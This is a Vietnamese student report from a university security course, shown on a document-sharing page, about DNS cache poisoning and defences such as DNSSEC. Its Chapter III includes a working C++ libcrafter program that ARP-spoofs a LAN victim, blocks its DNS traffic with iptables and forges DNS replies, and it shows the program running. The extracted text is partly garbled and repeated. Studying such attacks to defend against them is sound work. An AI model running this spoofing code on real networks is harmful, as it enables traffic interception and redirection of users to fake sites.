PHƯƠNG PHÁP TẤN CÔNG ĐẦU ĐỘC DNS VÀ GIẢI PHÁP PHÒNG CHỐNG

28 1.8K 23
PHƯƠNG PHÁP TẤN CÔNG ĐẦU ĐỘC DNS VÀ GIẢI PHÁP PHÒNG CHỐNG

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

Thông tin tài liệu

TRƯỜNG ĐẠI HỌC BÁCH KHOA HÀ NỘI VIỆN CÔNG NGHỆ THÔNG TIN VÀ TRUYỀN THÔNG    BÁO CÁO BÀI TẬP LỚN AN TOÀN & BẢO MẬT THÔNG TIN PHƯƠNG PHÁP TẤN CÔNG ĐẦU ĐỘC DNS VÀ GIẢI PHÁP PHÒNG CHỐNG Giảng viên hướng dẫn : TS Trần Đức Khánh Nhóm sinh viên : Nhóm 31 MỤC LỤC Phương pháp công đầu độc DNS & giải pháp phòng chống CHƯƠNG I TỔNG QUAN VỀ HỆ THỐNG DNS 1.1 DNS gì? DNS (Domain Name System), Hệ thống tên miền phát minh vào năm 1984 cho Internet, hệ thống cho phép thiết lập tương ứng địa IP tên miền Hệ thống tên miền (DNS) hệ thống đặt tên theo thứ tự cho máy vi tính, dịch vụ, nguồn lực tham gia vào Internet Nó liên kết nhiều thông tin đa dạng với tên miền gán cho người tham gia Quan trọng là, chuyển tên miền có ý nghĩa cho người vào số định danh (nhị phân), liên kết với trang thiết bị mạng cho mục đích định vị địa hóa thiết bị khắp giới Phép tương thường sử dụng để giải thích hệ thống tên miền là, phục vụ “Danh bạ điện thoại” để tìm Internet cách dịch tên máy chủ máy tính thành địa IP Ví dụ, www.example.com dịch thành 208.77.188.166 Hệ thống tên miền giúp cho định tên miền cho nhóm người sử dụng Internet cách có ý nghĩa, độc lập với địa điểm người sử dụng Bởi điều này, World-Wide Web (WWW) siêu liên kết trao đổi thông tin Internet trì ổn định cố định định tuyến dòng Internet thay đổi người tham gia sử dụng thiết bị di động Tên miền internet dễ nhớ địa IP 208.77.188.166 (IPv4) 2001: db8: 1f70:: 999: de8: 7648:6 e8 (IPv6) Mọi người tận dụng lợi họ thuật lại có nghĩa URL địa email mà không cần phải biết làm máy thực tìm chúng Hệ thống tên miền phân phối trách nhiệm gán tên miền lập đồ tên tới địa IP cách định rõ máy chủ có thẩm quyền cho tên miền Những máy chủ có tên thẩm quyền phân công chịu trách nhiệm tên miền riêng họ, định tên máy chủ Nhóm 09 – K54 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống khác độc quyền họ cho tên miền phụ Kỹ thuật thực chế phân phối DNS, chịu đựng lỗi, giúp tránh cần thiết cho trung tâm đơn lẻ để đăng kí tư vấn liên tục cập nhật Nhìn chung, Hệ thống tên miền lưu trữ loại thông tin khác, chẳng hạn danh sách máy chủ email mà chấp nhận thư điện tử cho tên miền Internet Bằng cách cung cấp cho giới rộng lớn, phân phối từ khóa – sở dịch vụ đổi hướng , Hệ thống tên miền thành phần thiết yếu cho chức Internet Các định dạng khác thẻ RFID, mã số UPC, kí tự Quốc tế địa email tên máy chủ, loạt định dạng khác có khả sử dụng DNS 1.2 Các đặc điểm DNS DNS sử dụng sở liệu dạng phân tán tổ chức theo mô hình (hierarchical): Cơ sở liệu phân tán phân cấp: Hình – Cấu trúc phân cấp phân tán hệ thống DNS Nhóm 09 – K54 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống Hình – Phân tán subdomain 1.3 Nguyên lý hoạt động hệ thống DNS  DNS hoạt động theo hình thức truy vấn đáp trả (Query/response)  Khi máy chủ DNS nhận yêu cầu phân giải địa (request) từ máy trạm, tra cứu đêm (Cache) trả địa IP tương ứng Ví dụ: Client muốn địa IP www.amazon.com; - Client truy cập root server tìm DNS server tương ứng với tên miền “com” - Client truy cập DNS server với miền “com” tìm DNS server amazon.com - Client truy cập máy chủ DNS amazon.com để lấy địa www.amazon.com Nhóm 09 – K54 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống Hình – Truy vấn kết hệ thống DNS Hình – Quy trình bước Nhóm 09 – K54 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống 1.4 Các ghi DNS 1.4.1 Bản ghi kiểu A Bản ghi kiểu A dùng để khai báo ánh xạ tên máy tính mạng địa IP tương ứng Nói cách khác, ghi kiểu A tên điạ IP máy tính mạng Bản ghi kiểu A có cú pháp sau: domain IN A Ví dụ: home.vnn.vn IN A 203.162.0.12 Theo ví dụ trên, tên miền home.vnn.vn khai với ghi kiểu A trỏ đến địa 203.162.0.12 tên máy tính Một tên miền khai nhiều ghi kiểu A khác để trỏ đến địa IP khác Như có nhiều máy tính có tên mạng Ngược lại máy tính có địa IP có nhiều tên miền trỏ đến, nhiên có tên miền xác định tên máy, tên miền khai với ghi kiểu A trỏ đến địa máy 1.4.2 Bản ghi kiểu AAAA Bản ghi kiểu AAAA dùng để chuyển đổi từ tên miền sang địa IPv6 Giống ghi kiểu A địa IPv4, tên miền khai nhiều ghi kiểu AAAA khác để trỏ đến địa IPv6 khác Bản ghi kiểu AAAA có cú pháp sau: domain IN AAAA Ví dụ: ipv6.vnnic.net IN AAAA 2001:dc8:5::115 Khai báo cho thấy tên miền ipv6.vnnic.net tên đặt cho máy tính có địa 2001:dc8:5::115 mạng Internet Nhóm 09 – K54 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống 1.4.3 Bản ghi kiểu CNAME Bản ghi CNAME cho phép máy tính có nhiều tên Nói cách khác ghi CNAME cho phép nhiều tên miền trỏ đến địa IP cho trước Để khai báo ghi CNAME, bắt buộc phải có ghi kiểu A để khai báo tên máy Tên miền khai báo ghi kiểu A trỏ đến địa IP máy gọi tên miền (canonical domain) Các tên miền khác muốn trỏ đến máy tính phải khai báo bí danh tên máy (alias domain) Cú pháp ghi CNAME alias-domain IN CNAME canonical domain Ví dụ : www.vnn.vn IN CNAME home.vnn.vn Tên miền www.vnn.vn tên bí danh tên miền home.vnn.vn , hai tên miền www.vnn.vn home.vnn.vn trỏ đến địa IP 203.162.0.12 1.4.4 Bản ghi MX Bản ghi MX dùng để khai báo trạm chuyển tiếp thư điện tử tên miền Ví dụ, để thư điện tử có cấu trúc user@vnn.vn gửi đến trạm chuyển tiếp thư điện tử có tên mail.vnn.vn , sở liệu DNS cần khai báo ghi MX sau: vnn.vn IN MX 10 mail.vnn.vn Các thông số khai báo ghi MX nêu gồm có: • vnn.vn : tên miền khai báo để sử dụng địa thư điện tử • mail.vnn.vn: tên trạm chuyển tiếp thư điện tử, thực tế tên máy tính dùng làm trạm chuyển tiếp thư điện tử • 10 : Là giá trị ưu tiên, giá trị ưu tiên số nguyên từ 1đến 255, giá trị ưu tiên nhỏ trạm chuyển tiếp thư điện tử khai báo sau trạm chuyển tiếp thư điện tử chuyển đến Ví dụ khai báo - vnn.vn IN MX 10 mail.vnn.vn - vnn.vn IN MX 20 backupmail.vnn.vn Nhóm 09 – K54 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống Thì tất thư điện tử có cấu trúc địa user@vnn.vn trước hết gửi đến trạm chuyển tiếp thư điện tử mail.vnn.vn Chỉ trường hợp máy chủ mail.vnn.vn nhận thư thư chuyển đến trạm chuyển tiếp thư điện tử backupmail.vnn.vn 1.4.5 Bản ghi NS Bản ghi NS dùng để khai báo máy chủ tên miền cho tên miền Nó cho biết thông tin tên miền khai báo máy chủ Với tên miền phải có tổi thiểu hai máy chủ tên miền quản lý, dó yêu cầu có tối thiểu hai ghi NS cho tên miền Cú pháp ghi NS IN NS Ví dụ vnnic.net.vn IN NS dns.vnnic.net.vn Với khai báo trên, tên miền vnnic.net.vn máy chủ tên miền có tên dns.vnnic.net.vn quản lý Điều có nghĩa, ghi A, CNAME, MX tên miền vnnic.net.vn tên miền cấp khai báo máy chủ dns.vnnic.net.vn 1.4.6 Bản ghi PTR Hệ thống DNS thực việc chuyển đổi từ tên miền sang địa IP mà thực chuyển đổi địa IP sang tên miền Bản ghi PTR cho phép thực chuyển đổi địa IP sang tên miền Ví dụ khai báo ghi PTR 12.0.162.203.in-addr.arpa IN PTR home.vnn.vn Bản ghi PTR cho phép tìm tên miền home.vnn.vn biết địa IP mà tên miền trỏ tới 1.4.7 Bản ghi NAPTR Bản ghi NAPTR ghi đặc biệt hệ thống tên miền, chứa đựng thông tin nguồn, dịch vụ ứng dụng kết hợp với Nhóm 09 – K54 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống số điện thoại xác định Những dịch vụ xác định lựa chọn khách hàng Ví dụ khai báo ghi NAPTR: IN NAPTR 5.1.1.6.2.2.8.4.4.8.e164.arpa IN NAPTR 10 10 “u” “mailto+E2U” “!^.*$! mailto:hmcuong@vnnic.net!” Với khai báo thực gọi số +84-4-8226115 ta thu mailto:hmcuong@vnnic.net Với ghi triển khai dịch vụ dựa hệ thống máy chủ DNS ENUM mang lại hội tụ viễn thông Internet tương lai CHƯƠNG II TẤN CÔNG ĐẦU ĐỘC DNS 2.1 Điểm yếu hệ thống DNS Như mô tả trên, DNS giao thức phân giải địa chỉ, dùng để ánh xạ tên miền (Domain) sang địa Internet (IP) Theo giao thức này, máy chủ DNS nhận yêu cầu phân giải địa (request) từ máy trạm, tra cứu đêm (cache) trả địa IP tương ứng với tên miền mà máy trạm yêu cầu Nhóm 09 – K54 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống Tuy nhiên, k tìm thấy đệm, máy chủ DNS chuyển tiếp yêu cầu phân giải tới máy chủ DNS khác Mỗi trao đổi phân giải A B xác thực thông qua số hiệu TID (Transaction ID) ngẫu nhiên Tuy nhiên, điểm yếu việc số TID số 16 bit (nhỏ 65535) trao đổi A B diễn cổng (port) cố định A Đây khâu phát có lỗ hổng nghiêm trọng mã khai thác lỗ hổng lan truyền mạng Internet Hình – Minh họa trình phân giải tên miền 2.2 Khái niệm công đầu độc DNS Là phương phấp công vào máy chủ đệm DNS Nhằm sửa đổi, làm sai lệch thông tin phân giải tên miền server Từ điều hướng người sử dụng dịch vụ DNS đến website sai lệch Nhóm 09 – K54 10 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống Cơ chế công Man – In – The – Middle – Giả mạo DNS Nhóm 09 – K54 14 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống 3.3 Mô công MITM – Giả mạo DNS 3.3.1 Mô Đầu tiên xác định địa IP máy chủ DNS ( máy chủ không nằm mạng LAN, phải địa router ) nạn nhân với từ khóa cho ngộ độc DNS ( chứa spoof_list STL map: "google" "proxy" ) địa IP mà muốn máy nạn nhân truy cập vào Tiếp theo, thực công ARP Posion tạo sniffer để lắng nghe UDP với cổng 53 (mặc định cho DNS) Tại thời điểm này, tất lưu lượng truy cập từ nạn nhân nên qua máy tính dùng để công Do đó, chuyển tiếp IP kích hoạt chúng em sử dụng IPTABLES để chặn tất lưu lượng UDP với nguồn cổng đích 53 Nói cách khác, tất liệu qua lại máy chủ DNS (192.168.1.1) nạn nhân (192.168.1.8) bị chuyển hướng (thông qua nhân xử lí chúng tôi) , ngoại trừ giao dịch DNS Sniffer có trách nhiệm xử lý chúng ( thông qua chức DNSSpoofer ) Cuối cùng, chức DNSSpoofer thực sniffer bắt gói, thực giả mạo DNS tên miền theo yêu cầu nạn nhân từ khóa cung cấp spoof_list map Nhóm 09 – K54 15 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống 3.3.2 Chương trình công c++ #include #include #include #include #include /* Collapse name spaces */ using namespace std; using namespace Crafter; /* Structure for save MAC addresses */ struct HostInfo { /* Interface */ string iface; /* IP address of the DNS server */ string dns_ip; /* IP address of the victim */ string victim_ip; /* MAC address of the device which is a DNS server (or the router if the DNS server is not in our local network) */ string dns_mac; /* MAC address of the victim */ string victim_mac; /* My MAC address */ string my_mac; }; /* Global map of IP-HOSTS pairs */ map spoof_list; /* Function for handling a packet when the sniffer caught one */ void DNSSpoofer(Packet* sniff_packet, void* user); /* IP tables "script" for dropping the DNS traffic */ void iptables_block(const string& iface, const string& victim_ip, int dst_port); /* IP tables "script" that flush all rules added */ void iptables_flush(const string& iface, const string& victim_ip, int dst_port); /* Global Sniffer pointer */ Sniffer* sniff; /* Function for handling a CTRL-C */ void ctrl_c(int dummy) { /* Cancel the sniffing thread */ sniff->Cancel(); } int main() { /* Init the library */ InitCrafter(); /* Set the interface */ string iface = "wlan0"; /* Create a structure with information about the attack */ HostInfo* host_info = new HostInfo; /* IP addresses -> This is a data supply by the user */ string dns_ip = "192.168.1.1"; short_word dst_port = 53; /* DNS traffic */ string victim_ip = "192.168.1.8"; /* List of addresses -> This also is data supplied by the user */ Nhóm 09 – K54 16 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống spoof_list["google"] = "1.2.3.4"; spoof_list["proxy"] = "3.3.3.3"; /* Create a HostInfo structure */ host_info->iface = iface; host_info->dns_ip = dns_ip; host_info->victim_ip = victim_ip; host_info->dns_mac = GetMAC(dns_ip,iface); host_info->victim_mac = GetMAC(victim_ip,iface); host_info->my_mac = GetMyMAC(iface); /* Before the attack, execute the IPTABLES "script" */ iptables_block(iface,victim_ip,dst_port); /* Start the ARP spoofing */ ARPContext* context = ARPSpoofingRequest(dns_ip,victim_ip,iface); /* Print data about the spoofing, and wait a few seconds */ PrintARPContext(*context); sleep(3); /* Create a sniffer */ sniff = new Sniffer("udp and host " + victim_ip + " and port " + StrPort(dst_port),iface,DNSSpoofer); /* Now, spawn the capture */ void* sniffer_arg = static_cast(host_info); sniff->Spawn(-1, sniffer_arg); cout GetSourceMAC() != host_data->my_mac) { /* Checks if the packet is coming from the victim */ if(ip_layer->GetSourceIP() == host_data->victim_ip) { /* Get the RawLayer */ RawLayer* raw_layer = GetRawLayer(*sniff_packet); /* Create a DNS header */ DNS dns_req; /* And decode it from a raw layer */ dns_req.FromRaw(*raw_layer); /* Check if the DNS packet is a query and there is a question on it */ if( (dns_req.GetQRFlag() == 0) && (dns_req.Queries.size() > 0) ) { /* Get the host name to be resolved */ string hostname = dns_req.Queries[0].GetName(); /* Print information */ cout SetDestinationIP(host_data>victim_ip); /* PUt the dns IP address as a source IP */ ip_layer->SetSourceIP(dns_ip); /* +++++ UDP Layer */ /* Swap the destinations and source port */ short_word src_port = udp_layer->GetSrcPort(); short_word dst_port = udp_layer->GetDstPort(); udp_layer->SetSrcPort(dst_port); udp_layer->SetDstPort(src_port); /* After modifying the layers, write the packet on the wire */ sniff_packet->Send(host_data->iface); } else { /* Send the packet to the dns */ ether_layer->SetDestinationMAC(host_data>dns_mac); /* And put our MAC ad a source */ ether_layer->SetSourceMAC(host_data->my_mac); /* After modifying the Ethernet layer, write the packet on the wire */ sniff_packet->Send(host_data->iface); } /* or coming from the server */ } else if (ip_layer->GetDestinationIP() == host_data->victim_ip) { /* Send the packet to the victim */ ether_layer->SetDestinationMAC(host_data->victim_mac); /* And put our MAC ad a source */ ether_layer->SetSourceMAC(host_data->my_mac); /* After modifying the Ethernet layer, write the packet on the wire */ sniff_packet->Send(host_data->iface); } Nhóm 09 – K54 19 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống } } void iptables_block(const string& iface, const string& victim_ip, int dst_port) { /* Activate IP forwarding */ system("/bin/echo > /proc/sys/net/ipv4/ip_forward"); /* Drop packets sent to or received from a http server (for victim IP address) */ system(string("/sbin/iptables -A FORWARD -s " + victim_ip + " -p udp dport " + StrPort(dst_port) + " -j DROP").c_str()); system(string("/sbin/iptables -A FORWARD -d " + victim_ip + " -p udp sport " + StrPort(dst_port) + " -j DROP").c_str()); /* Remember that libcrafter doesn't mind about local firewalls rules */ } void iptables_flush(const string& iface, const string& victim_ip, int dst_port) { /* Disable IP forwarding */ system("/bin/echo > /proc/sys/net/ipv4/ip_forward"); /* Delete the rules */ system(string("/sbin/iptables -D FORWARD -s " + victim_ip + " -p udp dport " + StrPort(dst_port) + " -j DROP").c_str()); system(string("/sbin/iptables -D FORWARD -d " + victim_ip + " -p udp sport " + StrPort(dst_port) + " -j DROP").c_str()); } Nhóm 09 – K54 20 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống 3.3.3 Chạy chương trình công máy mạng Lan Khi bắt đầu chạy chương trình: Chương trình đưa địa Mac máy công địa Mác máy bị công Nhóm 09 – K54 21 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống Sau đó, với truy cập máy Victin (máy bị công) bị máy Attacker nghe Mọi cố gắng truy cập đến tên miền www.google.com.ar bị chuyển đến địa IP: 1.2.3.4 Nhóm 09 – K54 22 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống Nhóm 09 – K54 23 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống Chương 4: Phòng chống giả mạo DNS Khá khó phòng chống việc giả mạo DNS có dấu hiệu công Thông thường, bạn DNS bị giả mạo điều xảy Những bạn nhận trang web khác hoàn toàn so với mong đợi Trong công với chủ đích lớn, bạn bị lừa nhập thông tin quan trọng vào website giả mạo nhận gọi từ ngân hàng hỏi bạn lại rút nhiều tiền đến Mặc dù khó biện pháp phòng chống kiểu công này, sô thứ bạn cần thực hiện: 4.1 Bảo vệ máy tính bên bạn Các công giống thường thực thi từ bên mạng bạn Nếu thiết bị mạng an toàn bạn giảm khả host bị thỏa hiệp sử dụng để khởi chạy công giả mạo 4.2 Thận trọng duyệt internet: Đối với người sử dụng cá nhân, cần thận trọng thời gian truy cập Internet.Nếu vào website quen thuộc lại gặp tượng không bình thường, cá nhân nên thông báo với quản trị mạng quan hỗ trợ kỹ thuật ISP để có biện pháp xử lý kịp thời Ngoài ra, nên cập nhật đầy đủ vá hệ điều hành phần mềm diệt virus để tránh nguy bị lây nhiễm mã độc 4.3 Sử dụng DNSSEC: DNSSEC công nghệ an toàn mở rộng cho hệ thống DNS Trong DNSSEC cung cấp chế xác thực máy chủ DNS với xác thực cho vùng liệu để đảm bảo toàn vẹn liệu Với cách thức tổ chức thêm ghi giao thức chỉnh sửa nhằm chứng thực nguồn gốc tính toàn vẹn liệu cho hệ thống, với DNSSEC, hệ thống DNS mở rộng thêm tính bảo mật Nhóm 09 – K54 24 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống tăng cường độ an toàn, tin cậy, khắc phục nhược điểm thiết kế sơ khai ban đầu Vừa đáp ứng yêu cầu thông tin định tuyến tên miền, giao thức làm việc máy chủ DNS với nhau, vừa đáp ứng yêu cầu bảo mật, tăng cường khả dự phòng cho hệ thống Vì vậy, việc triển khai DNSSEC cần thiết để đảm bảo an toàn cho hệ thống DNS, dịch vụ trực tuyến Internet 4.4 Kiểm tra lỗ hổng DNS Cache Poisoning Ta sử dụng phần mềm BkavDNSCheck để kiểm tra xem máy chủ DNS có lỗ hổng DNS Cache Poisoning hay không Và thực biện pháp vá lỗi cần thiết để bảo vệ DNS server Giới thiệu sơ lược phần mềm BkavDNSCheck: - Xuất xứ: Do Trung tâm An ninh mạng Bách Khoa (Bkis) phát hành vào ngày 25/07/2008 - Tính năng: Cho phép kiểm tra, phát hệ thống máy chủ DNS có lỗ hổng Subdomain Exploit DNS Cache Poisoning hay không - Link download: http://www.bkav.com.vn/DNSCheck/BkavDNSCheck.exe - Cùng với việc phát hành phần mềm này, Bkis hướng dẫn cách vá lỗ hổng để tránh nguy bùng phát công vào hệ thống DNS Việt Nam Ngoài ra, ta sử dụng số phần mềm khác để bảo vệ máy tính khỏi công DNS Cache Poisoning như: • Hitman Pro (32bit and 64bit versions): http://www.surfright.nl/en/products/ • Kaspersky Labs TDSSKiller: http://support.kaspersky.com/faq/?qid=208283363 • McAfee Stinger: http://www.mcafee.com/us/downloads/free-tools/stinger.aspx • Microsoft Windows Defender Offline: http://windows.microsoft.com/en-US/windows/what-is-windowsdefender-offline • Microsoft Safety Scanner: http://www.microsoft.com/security/scanner/en-us/default.aspx • Norton Power Eraser: http://security.symantec.com/nbrt/npe.aspx • Trend Micro Housecall: http://housecall.trendmicro.com • MacScan: http://macscan.securemac.com/ Nhóm 09 – K54 25 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống Avira’s DNS Repair-Tool: http://www.avira.com/en/support-forhome-knowledgebase-detail/kbid/1199 Nhóm 09 – K54 26 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống TÀI LIỆU THAM KHẢO Để thực báo cáo này, nhóm có tham khảo số tài liệu sau: http://www.quantrimang.com.vn http://hoangho.wordpress.com/ https://www.youtube.com http://web.dongtak.eu/ http://letonphat.wordpress.com/ Nhóm 09 – K54 27 Trang Phương pháp công đầu độc DNS & giải pháp phòng chống KẾT LUẬN Giả mạo DNS (DNS Cache Poisoning) hình thức công MITM nguy hiểm với nhiều mục đích xấu hacker Sử dụng công nghệ hacker tận dụng kỹ thuật giả mạo để đánh cắp thông tin quan trọng người dùng, hay cài đặt malware ổ đĩa bị khai thác, gây công từ chối dịch vụ Nhóm 09 – K54 28 Trang [...]... thể đầu độc bộ đệm của máy A, để ánh xạ tên miền bị tấn công sang 1 địa chỉ IP mà hacker chỉ định 13 Trang Phương pháp tấn công đầu độc DNS & giải pháp phòng chống Cơ chế tấn công Man – In – The – Middle – Giả mạo DNS Nhóm 09 – K54 14 Trang Phương pháp tấn công đầu độc DNS & giải pháp phòng chống 3.3 Mô phỏng tấn công MITM – Giả mạo DNS 3.3.1 Mô phỏng Đầu tiên xác định các địa chỉ IP của máy chủ DNS. .. 09 – K54 20 Trang Phương pháp tấn công đầu độc DNS & giải pháp phòng chống 3.3.3 Chạy chương trình tấn công một máy trong mạng Lan Khi bắt đầu chạy chương trình: Chương trình đưa ra địa chỉ Mac của máy tấn công và địa chỉ Mác của máy bị tấn công Nhóm 09 – K54 21 Trang Phương pháp tấn công đầu độc DNS & giải pháp phòng chống Sau đó, với mọi truy cập bất kì của máy Victin (máy bị tấn công) đều bị máy... www.google.com.ar đều bị chuyển đến địa chỉ IP: 1.2.3.4 Nhóm 09 – K54 22 Trang Phương pháp tấn công đầu độc DNS & giải pháp phòng chống Nhóm 09 – K54 23 Trang Phương pháp tấn công đầu độc DNS & giải pháp phòng chống Chương 4: Phòng chống giả mạo DNS Khá khó phòng chống việc giả mạo DNS vì có khá ít các dấu hiệu tấn công Thông thường, bạn không hề biết DNS của mình bị giả mạo cho tới khi điều đó xảy ra Những gì bạn... http://housecall.trendmicro.com • MacScan: http://macscan.securemac.com/ Nhóm 09 – K54 25 Trang Phương pháp tấn công đầu độc DNS & giải pháp phòng chống Avira’s DNS Repair-Tool: http://www.avira.com/en/support-forhome-knowledgebase-detail/kbid/1199 Nhóm 09 – K54 26 Trang Phương pháp tấn công đầu độc DNS & giải pháp phòng chống TÀI LIỆU THAM KHẢO Để thực hiện bài báo cáo này, nhóm có tham khảo một số tài liệu.. .Phương pháp tấn công đầu độc DNS & giải pháp phòng chống Hình 6 – Tấn công đầu độc DNS 2.3 Mức độ nguy hiểm: Nếu thành công sẽ cực kỳ nguy hiểm Bằng cách đầu độc bản ghi tên miền cho, kẻ tấn công có thể chuyển người sử dụng của nhà cung cấp dịch vụ Internet đó tới một máy chủ độc, website giả mạo mỗi khi họ cố gắng truy cập trang web Đặc... K54 12 Trang Phương pháp tấn công đầu độc DNS & giải pháp phòng chống 3.2 Các bước tấn công • Máy hacker gửi hàng loạt yêu cầu phân giải địa chỉ tới máy chủ • • • • Nhóm 09 – K54 DNS nạn nhân (máy A) Các tên miền cần phân giải đã được hacker tính toán sao cho máy chủ A k thể tìm thấy trong bộ đệm của nó và buộc phải chuyển tiếp tới máy chủ DNS tiếp theo (máy B) Mỗi trao đổi phân giải giữa A và B được... web Đặc biệt nguy hiểm nếu là website ngân hàng, thương mại điện tử Nhóm 09 – K54 11 Trang Phương pháp tấn công đầu độc DNS & giải pháp phòng chống Chương III: Phương Pháp Tấn Công Man – In – The – Middle (MITM) – Giả mạo DNS 3.1 Tổng quan: Giả mạo DNS là một kỹ thuật MITM được sử dụng nhằm cung cấp thông tin DNS sai cho một host để khi người dùng duyệt đến một địa chỉ nào đó, ví dụ, www.google.com.vn... K54 27 Trang Phương pháp tấn công đầu độc DNS & giải pháp phòng chống KẾT LUẬN Giả mạo DNS (DNS Cache Poisoning) là một hình thức tấn công MITM khá nguy hiểm với nhiều mục đích xấu của các hacker Sử dụng công nghệ này những hacker có thể tận dụng các kỹ thuật giả mạo để đánh cắp các thông tin quan trọng của người dùng, hay cài đặt malware trên một ổ đĩa bị khai thác, hoặc gây ra một tấn công từ chối... chức thêm những bản ghi mới và những giao thức đã được chỉnh sửa nhằm chứng thực nguồn gốc và tính toàn vẹn dữ liệu cho hệ thống, với DNSSEC, hệ thống DNS đã được mở rộng thêm các tính năng bảo mật và Nhóm 09 – K54 24 Trang Phương pháp tấn công đầu độc DNS & giải pháp phòng chống được tăng cường độ an toàn, tin cậy, khắc phục được những nhược điểm của thiết kế sơ khai ban đầu Vừa đáp ứng được các yêu... the DNS Answer */ DNS: :DNSAnswer dns_ answer(hostname,ip_address); /* And put it into the container */ dns_ req.Answers.push_back (dns_ answer); /* Modify the original request */ dns_ req.SetQRFlag(1); /* Now is a response */ dns_ req.SetRAFlag(1); /* Recursion is available */ /* Set the spoof flag */ spoof = 1; /* Break the loop */ break; } } } Nhóm 09 – K54 18 Trang Phương pháp tấn công đầu độc DNS & giải

Ngày đăng: 30/12/2015, 20:33

Từ khóa liên quan

Mục lục

  • CHƯƠNG I

  • TỔNG QUAN VỀ HỆ THỐNG DNS

    • 1.1 DNS là gì?

    • 1.2 Các đặc điểm của DNS

    • 1.3 Nguyên lý hoạt động của hệ thống DNS

    • 1.4 Các bản ghi của DNS

      • 1.4.1 Bản ghi kiểu A

      • 1.4.2 Bản ghi kiểu AAAA

      • 1.4.3 Bản ghi kiểu CNAME

      • 1.4.4 Bản ghi MX

      • 1.4.5 Bản ghi NS

      • 1.4.6 Bản ghi PTR

      • 1.4.7 Bản ghi NAPTR

      • CHƯƠNG II

      • TẤN CÔNG ĐẦU ĐỘC DNS

        • 2.1 Điểm yếu của hệ thống DNS

        • 2.2 Khái niệm tấn công đầu độc DNS

        • 2.3 Mức độ nguy hiểm:

        • Chương III: Phương Pháp Tấn Công Man – In – The – Middle (MITM) – Giả mạo DNS

          • 3.1 Tổng quan:

          • 3.2 Các bước tấn công

            • 3.3.1 Mô phỏng

            • 3.3.2 Chương trình tấn công bằng c++

            • 3.3.3 Chạy chương trình tấn công một máy trong mạng Lan

            • Chương 4: Phòng chống giả mạo DNS

Tài liệu cùng người dùng

Tài liệu liên quan